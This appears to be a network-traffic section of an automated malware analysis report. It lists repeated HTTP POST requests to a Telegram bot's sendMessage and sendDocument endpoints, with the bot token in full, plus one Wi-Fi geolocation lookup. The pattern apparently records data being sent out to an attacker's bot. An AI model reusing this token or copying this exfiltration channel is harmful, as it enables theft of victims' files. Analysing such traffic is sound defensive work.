Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 160Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="aabc68b0-0b54-4330-9a22-9260ea5a3656"Host: api.telegram.orgContent-Length: 955Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="ce3eefb3-86bf-4968-a35e-c20038f39fae"Host: api.telegram.orgContent-Length: 620Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="c651678e-ae3a-40a3-951b-c07009491b7f"Host: api.telegram.orgContent-Length: 29741Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 237Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 386Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 160Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="4a463c5b-b1f8-4ae6-b5a8-f7c39bea3160"Host: api.telegram.orgContent-Length: 5157Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="3c1241bd-4ab9-4d98-b7e6-c2f6c8b0721e"Host: api.telegram.orgContent-Length: 26578Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="68e19271-1a8c-4a96-bb7f-f989f15c0ebf"Host: api.telegram.orgContent-Length: 528Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 237Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 171Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="ace3ea1e-b52e-4af8-b2cf-6e562ff36ead"Host: api.telegram.orgContent-Length: 9435Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9bbcc1e4-a650-43d4-8bc8-1ae3af992f7b"Host: api.telegram.orgContent-Length: 8280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="8cb98721-d75f-4598-b4e1-c08a62a90c3f"Host: api.telegram.orgContent-Length: 61700Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 233Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 155Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="794248ae-12fd-4b7b-bc57-e79898ae7f2a"Host: api.telegram.orgContent-Length: 3139Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="96735425-aaf7-4152-b267-6c98daa776a9"Host: api.telegram.orgContent-Length: 6007Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9dfbb0fb-9ca1-41ad-ac6e-08850e17be28"Host: api.telegram.orgContent-Length: 82396Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 233Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="189c1f2a-3378-4c39-b851-08cfff36ab50"Host: api.telegram.orgContent-Length: 4105Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="61fcfbab-ba2e-4b25-a79b-34d1c637f3c1"Host: api.telegram.orgContent-Length: 19912Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 159Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 177Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="19534887-ce91-4171-84c2-57443fed7b34"Host: api.telegram.orgContent-Length: 80981Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f2a56f47-f128-4051-8818-f094aa75114e"Host: api.telegram.orgContent-Length: 2446Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="76e745c7-b56c-4502-9c5d-96096f6bc769"Host: api.telegram.orgContent-Length: 2132Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 183Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 192Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e518a1a9-6cde-421c-b9a7-a1edbc30fa72"Host: api.telegram.orgContent-Length: 22687Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="426ff023-bd5d-4668-9bf7-e3b45dfa899e"Host: api.telegram.orgContent-Length: 13011Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="eb1ce6c3-ef84-4542-9110-d67001d0014a"Host: api.telegram.orgContent-Length: 3183Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 166Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 176Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="86970169-c32b-41e9-af9b-e0233f251799"Host: api.telegram.orgContent-Length: 112820Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="3e07cba2-404a-415c-837b-d92400b847d0"Host: api.telegram.orgContent-Length: 611Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 175Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="fc13998b-2668-43cd-9a22-6549072c4a27"Host: api.telegram.orgContent-Length: 4152Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 180Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="d9eb4d47-46b1-4135-94d1-fd710121077f"Host: api.telegram.orgContent-Length: 57544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e713547f-3bad-4959-9563-b0ac38454858"Host: api.telegram.orgContent-Length: 889Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9b01aca3-bab5-4d8f-b243-d333c19c0bfc"Host: api.telegram.orgContent-Length: 6085Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 171Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 180Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="8bb134c7-bf6e-4aa8-a8b9-fc0060f8f956"Host: api.telegram.orgContent-Length: 33335Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="7923b787-ff45-47a9-8643-9418ef7c0093"Host: api.telegram.orgContent-Length: 632Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 177Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="8b792bf8-c0c2-42be-bf27-b3ebe8d1efc5"Host: api.telegram.orgContent-Length: 10382Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 186Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f3440d2e-f13b-425e-9f40-142dcb442079"Host: api.telegram.orgContent-Length: 47225Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b22b7fb5-d676-4870-bff8-d4e2876d7f5d"Host: api.telegram.orgContent-Length: 29920Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="29abcbe2-df31-4261-85ff-4f986c0f4e56"Host: api.telegram.orgContent-Length: 7273Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 177Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 200Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a49c2171-c60b-4e28-92ee-4734b85d93be"Host: api.telegram.orgContent-Length: 41054Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="4270b7f1-9a21-4935-967d-bf3e59be0813"Host: api.telegram.orgContent-Length: 67078Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="61c18d17-b096-44fa-8cb1-9f4c3a4488c4"Host: api.telegram.orgContent-Length: 25657Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 178Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 193Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e2042cd9-8c14-49b6-9d9e-0cc585191769"Host: api.telegram.orgContent-Length: 116285Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="62287d0f-0b6c-47b0-b6e4-ad01d529d89d"Host: api.telegram.orgContent-Length: 1805Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a01ca172-258d-4567-b02d-a69fa5315b13"Host: api.telegram.orgContent-Length: 1439Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 194Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 191Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="282cf0c9-a535-4b59-94fe-489052a78285"Host: api.telegram.orgContent-Length: 109107Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="42b883b6-8606-433d-a882-3565fa153195"Host: api.telegram.orgContent-Length: 2729Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="5764b627-e435-4025-af22-690304ebe0db"Host: api.telegram.orgContent-Length: 4823Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 206Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="5213a531-cdd9-41ed-b57a-5eab396bc7b4"Host: api.telegram.orgContent-Length: 20909Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9c5ad812-cec1-4484-bd82-61b08eacc398"Host: api.telegram.orgContent-Length: 10736Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="01237f47-e54f-454d-b415-d19b99060966"Host: api.telegram.orgContent-Length: 4093Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 192Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f7efe596-b9a4-4a9d-a72b-cecb105c947d"Host: api.telegram.orgContent-Length: 12105Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b6cb405c-04eb-43d6-ba00-d6409730876d"Host: api.telegram.orgContent-Length: 906Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="b7298f88-349a-440b-b738-c6ccb7741a2b"Host: api.telegram.orgContent-Length: 7031Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 258Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="cb64dd65-ede1-4e21-aa17-668eb81d83aa"Host: api.telegram.orgContent-Length: 164833Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 191Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="847624d9-3cac-4013-b309-bdd6a29197ef"Host: api.telegram.orgContent-Length: 2626Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6fc179b3-179f-42eb-bb89-5be8323bca03"Host: api.telegram.orgContent-Length: 2358Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="ffb60a0e-026e-416f-bcce-3dd055f53b54"Host: api.telegram.orgContent-Length: 65004Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 197Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 349Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="9f4e5b67-41a5-4c86-8b46-62259f51db46"Host: api.telegram.orgContent-Length: 4678Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 257Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e1b8c051-63cd-40a7-850e-2a1047e28315"Host: api.telegram.orgContent-Length: 5509Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 187Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="18138dec-ec81-44d9-ad3c-bb0774d86778"Host: api.telegram.orgContent-Length: 13236Expect: 100-continue
